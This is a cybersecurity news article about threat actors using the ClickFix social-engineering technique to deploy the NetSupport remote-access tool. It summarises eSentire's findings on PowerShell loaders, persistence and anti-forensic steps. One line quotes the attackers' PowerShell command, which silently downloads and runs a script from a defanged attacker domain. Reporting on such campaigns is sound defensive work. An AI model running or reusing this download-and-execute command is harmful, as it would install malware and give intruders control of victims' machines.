Cybercriminals continue to evolve their tactics for compromising systems, with recent campaigns demonstrating a significant shift from traditional fake update methods to more sophisticated social engineering approaches.
Throughout 2025, threat actors have increasingly adopted the ClickFix technique as their primary delivery mechanism for deploying NetSupport Manager, a legitimate remote administration tool that has become attractive to malicious actors seeking unauthorized system access and control.
The attack pattern begins with social engineering, where victims encounter deceptive ClickFix pages designed to trick them into executing malicious commands through the Windows Run Prompt.
Once executed, these commands trigger a multi-stage infection process that ultimately results in NetSupport being installed on the compromised system.
eSentire Threat Response Unit analysts identified that three distinct threat groups have coordinated their efforts around this particular attack methodology, indicating a broader shift across the cybercriminal landscape toward this delivery vector.
eSentire Threat Response Unit researchers noted that the malware’s infection mechanism reveals sophisticated operational security measures.
What makes this campaign particularly concerning is how threat actors have streamlined their delivery infrastructure to reduce detection and maximize success rates across diverse victim environments.
PowerShell-Based Persistence and Execution Framework
The infection chain relies heavily on PowerShell-based loaders that employ multi-stage encoding and obfuscation techniques.
.webp "Hackers Leveraging ClickFix Technique to Deploy NetSupport RAT Loaders 3")
The first stage loader downloads a base64-encoded JSON blob from attacker-controlled servers, with commands like:-
PowerShell.exe -w h -nop -ep Bypass -c "$S='hxxps://riverlino[.]com/U.GRE';$j=$env:TEMP+'1.ps1';(New-Object Net.WebClient).DownloadFile($S,$j);powershell -f $j"Once executed, the loader decodes the JSON configuration and extracts each payload component.
The malware creates hidden system directories and writes base64-decoded files to disk, establishing persistence through startup folder shortcuts in %APPDATA%MicrosoftWindowsStart MenuProgramsStartup.
Recent variants have evolved to include RunMRU registry deletion techniques, deliberately erasing evidence of Run Prompt execution to complicate forensic investigations.
Secondary loaders utilize MSI installer packages executed through msiexec, embedding additional base64-encoded PowerShell commands that undergo character-point subtraction deobfuscation before execution.
This layered approach demonstrates threat actors’ commitment to evading static detection mechanisms while maintaining flexible command execution capabilities.
Organizations encountering suspicious ClickFix prompts or unexpected NetSupport installations should immediately isolate affected systems and conduct comprehensive forensic analysis.
Network defenders should implement application whitelisting controls and monitor for suspicious PowerShell activity, particularly commands involving base64 decoding and non-standard execution policies.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
